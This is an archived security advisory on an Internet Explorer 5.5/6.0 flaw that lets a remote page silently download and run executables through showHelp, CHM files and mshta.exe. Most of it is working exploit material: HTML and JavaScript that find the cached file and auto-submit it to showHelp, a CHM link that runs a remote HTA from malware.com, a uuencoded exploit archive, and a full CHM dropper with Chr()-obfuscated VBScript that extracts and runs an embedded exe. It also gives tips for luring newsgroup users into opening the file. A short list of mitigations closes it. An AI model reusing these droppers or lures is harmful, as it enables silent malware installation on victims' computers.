COMMAND IE may be fooled by remote site to download and run any file SYSTEMS AFFECTED Internet Explorer 5.5 and 6.0 PROBLEM http-equiv [http://www.malware.com] posted : Default installation of Internet Explorer 5.5 and 6.0 still allows us to execute files on default installations of the target computer, technically trivial silent delivery and installation of an executable on the target computer.: We cobble together new and old Components as follows : - 1. Courtesy of Georgi Guninski see : [http://www.securityfocus.com/bid/1033] 2. Courtesy of Georgi Guninski see : [http://www.securityfocus.com/bid/2456] 3. Mshta.exe http://www.malware.com/foobar.hta see : [http://www.securitybugware.org/NT/1279.html] Either 1 or 2 above canno\'t be exploited alone. Nothing can be activated through the Temporary Internet Files unless full path names are known for both showHelp calling and Click() of our link. However malware team was able to retrieve from the Temporary Internet File a trojanised html, determine the location of it, write this location out to a showHelp call and thereafter execute a specified remote link. Sample Exploit : ============== We create a very simple *.html file like so: <bgsound src=\"http://www.malware.com/malware.chm\"> this will pull our *.chm into the Temporary Internet File when then include the Guninski scripting to determine the location of our *.html file like so: malware=document.URL; path=malware.substr(-0,malware.lastIndexOf(\"\\\\\")); path=unescape(path); we then take that location information and write it to a simple html form like so: document.write(\'<FORM name=\"malware\" ACTION=\"javascript:window.showHelp(document.forms[0].elements [0].value)\">\'); document.write(\'<form><input type=\"hidden\" size=\"40\" maxlength=\"80\" value=\"\'+path+\'\\\\malware[1].chm\"></form>\'); technical note: it seems the myriad of patching to date does not make it possible to pass the location directly to the showHelp call. It must be written to the form which can then be automatically submitted: setTimeout(\'document.malware.submit()\',5000); before we do all that we create our very simple malware.chm and include our link object like so: C:\\WINDOWS\\SYSTEM\\Mshta.exe,http://www.malware.com/foobar.hta this is particularly interesting as we are able to pass a link to the mshta.exe, which in turn will open from the remote site our *.hta which includes our executable. All without warning. technical note: the possibility is excellent to repeat the entire process above directly inside the *.chm file and drop an *.exe from within the *.chm into the same Temporary Internet File. Using our Guninski scripting to determine the location of the *.chm and write that to the link parameter within it: value=\"\'+path+\'\\\\malware [1].exe\"> and execute it. So what happens? =============== We construct our trojanised *.html file and send it off to our target computer. This can be via mail or news. The recipient receives the mail message and attached *.html file. We then convince our unsuspecting recipient to open our *.html. This should be quite trivial, particularly in news as the attached file is in fact nothing more than a 500 byte html file. Consider the following scenario in your favourite web design news group: Carefully note: there is a hardened security warning when attempting to open attached *.html file. However our combination call for assistance coupled with nothing more than a legitimate *.html file should prove more than tempting: screen shot: http://www.malware.com/duh.png 18KB Why does it happen? ================== Because our simple *.html file is an attachment, security has it transfer to the Internet Temporary File for opening, under the security browser\'s settings. However, precisely because it is physically opened within the TIF, we can use our Guninski scripting to determine the exact location, write that exact location to our form and call our *.chm where it too resides. Working Example below, includes harmless?? *.exe -- the *.chm is hardcoded for win98. Due to pathetic technical reasons our *.chm is off-site and may delay in transferring to the TIF and could possibly fail, working example must be attached to mail or news. UUEncoded begin 644 help!.zip M4$L#!!0``@`(``F21RQ5&;V@E`$``((\"```0````:\'1M;%]T86)L97,N:\'1M M;&U238O;,!\"]&_P?!EULLUG;&UI:MG:@+)0&VJ:DV5.2@U:>Q%HLR>@CWK3T MOU=R$]/\"\"AUFAC?OS1=43T>CG&S`:%:3UMK^OB@$[0:J,1>NLUQ0R6G.E)C\" MK!5D$4<01W%4_7A8+[]O%L$N\"GB7EW/_X4(T#$,^92EQ`9V5`T\'/P)0TO$$- M@^:6RR,8/*&F\'71<HAFA7`*C!N$?::!:\\Q,:H`:V=WM0&K;S/:!E@?[@)+-< MR6M&FL71KS@R=:.8$RAM_KC^\\B&.>FK;VN3&/1FKT]MR9O*.&KN4#;ZL#BG9 M[4B677\'.E\\-HCVGP0G0B\"Y5CFE2?5NNO(*G`FER$\"7Q\\V\"Q7WVKR3$_4,,U[ M>S]PV:@A-ZT:/F/7IQ//06EAMN4^QPY#8+1/M\'.8D47RJF1(651<]LZ\"/?=> MN>5-@Y(`&/[3NV]*XJ?PTJ$\\^A[(>^^.C#5);D(C-\\EN=RG6S_\'O5JMBI!T5 M#=H-%ZB<39-)_;H(/SC!;9HEL[O2OX\"\'W_!?$IE60&;SMP$#\'E`5T\\6,!_0\' M4$L#!!0````(`)N21RSS>=1RX````\"L!```*````<F5A9&UE+G1X=\"5/RTK$ M0!\"\\!_(/]0\'KK\'I1]Y:5P`9,!!/Q*+U)NPG.(\\PTCOOWSD3H0W5U457]H&[O MTY1%6<PBZV&_CS$J0SJ29S4ZDR]W\"K,8_2ETUAQ4QIDF$1IGB`/9*]C0HF$X M!+HPG(?E&+\"Z((N]9\'EW/&`X-3W:]W[`L4;5H1J&ZOG4UMV`ID-;-2]X?4-7 M?_1;(_(F!08H_F7$16N,GDD89JN7V!VT&S-#=L+$FA/\\2N&+#4)6$+2[,0Z> M5TW7[%D6U@D?D+PGC&[B:=/\'Q3X][I\"Z?G/>)/TU,W[(+_]/*_4\'4$L!`A0` M%``\"``@`\"9)\'+%49O:\"4`0``@@(``!```````````0`@`+:!`````&AT;6Q? M=&%B;&5S+FAT;6Q02P$\"%``4````\"`\";DD<L\\WG4<N`````K`0``\"@`````` L```!`\"``MH\'\"`0``<F5A9&UE+G1X=%!+!08``````@`\"`\'8```#*`@`````` ` end 854 bytes Update (11 February 2002) ====== dzzie [http://geocities.com/dzzie] posted another exploit, proof of concept on a chm exe dropper : This works from Internet Temp files directory as well, all someone has to do is choose the open option when they click a link to a chm file, and they are done. ------------------------------------------------- flow of events ------------------------------------------------- 1) chm opens a) determines absolute path current folder b) determines parent chm name (in case cached changes name) c) detects winNT or win98 to work on both 2) chm name is used to auto generate vbs script data abs path is used to auto generate html object data script writes dynamically generated content to window 3) first object activated programatically....vbs script is echoed into existance into same folder as parent chm file 4) waits 1sec then activates echoed.vbs file...this vbs file reads the parent .chm and extracts a hello world exe that is appended onto the chm file. 5) after exe is written to disk vbs script then activates it ------------------------------------------------------------- script below ------------------------------------------------------------- msg=\'<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\\\</h1></center>\' function getChmAbsPath(){ t=unescape(location.href) return t.substring(t.indexOf(\":\",4)+1,t.lastIndexOf(\"\\\\\")+1) } function getChmName(){ l=unescape(location.href) chmName=l.substring(l.lastIndexOf(\"\\\\\")+1,l.lastIndexOf(\":\")-1) t=\'Chr(92)+\' for(i=0;i<chmName.length;i++){ t+= \'Chr(\' + chmName.charCodeAt(i) + \')+\' } return t.substring(0,t.length-1); } function getInterpreter(){ if(navigator.userAgent.indexOf(\'NT\') > 0){ return \'cmd\'; }else{ return \'command\'; } } vbs=\'fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):\'+ \'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):\'+ \'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):\'+ \'set i=createobject(fso):\'+ \'set o=createobject(fso):\'+ \'set w=createobject(wsc):\'+ \'pf=i.GetParentFolderName(WSCript.ScriptFullName):\'+ \'infile=pf+\' + getChmName() + \':\'+ \'outfile=pf+exename:\'+ \'OFFSET=XXXXXXX:\'+ \'Set ii=i.OpenTextFile(infile):\'+ \'Set oo=o.OpenTextFile(outfile,2,True):\'+ \'ii.Read OFFSET:\'+ \'While Not ii.AtEndOfStream:\'+ \'oo.Write Chr(Asc(ii.Read(1))):\'+ \'Wend:ii.close:oo.close:\'+ \'w.Run chr(34)+outfile+chr(34)\' hit=\'<OBJECT id=shortcut^ type=\"application/x-oleobject\" \'+ \'classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" \'+ \'codebase=\"hhctrl.ocx\\#Version=4,72,8252,0\" width=100 \'+ \'height=100><PARAM name=\"Command\" value=\"ShortCut\"> \'+ \'<PARAM name=\"Text\" value=\"Text: \"> \'+ \'<PARAM name=\"Item1\" value=\\\',*\\\'> \'+ \'<PARAM name=\"Item2\" value=\"273,1,1\"></OBJECT> \' scriptPath = getChmAbsPath() + \'echoed.vbs\' cmd=new Array cmd[1]= getInterpreter() + \',/c echo \' + vbs + \' > \"\' + scriptPath + \'\"\' cmd[2]=\'wscript,\"\' + scriptPath + \'\"\' function replace(h,i,c){ h = h.split(\'^\').join(i).split(\'*\').join(c) return h } hit1=replace(hit,1,cmd[1]) hit2=replace(hit,2,cmd[2]) document.write(hit1+hit2+msg) shortcut1.Click() setTimeout(\"shortcut2.Click()\",1000) SOLUTION 1. Be aware of \"innocent\" *.html files in mail and news 2. Disable Active Scripting and Active X controls 3. Disable the HHCtrl ActiveX control, see:http://www.kb.cert.org/vuls/id/25249 ] 4. Disable or Remove Mshta.exe [although if an *.exe embedded directly into the *.chm then this has no impact]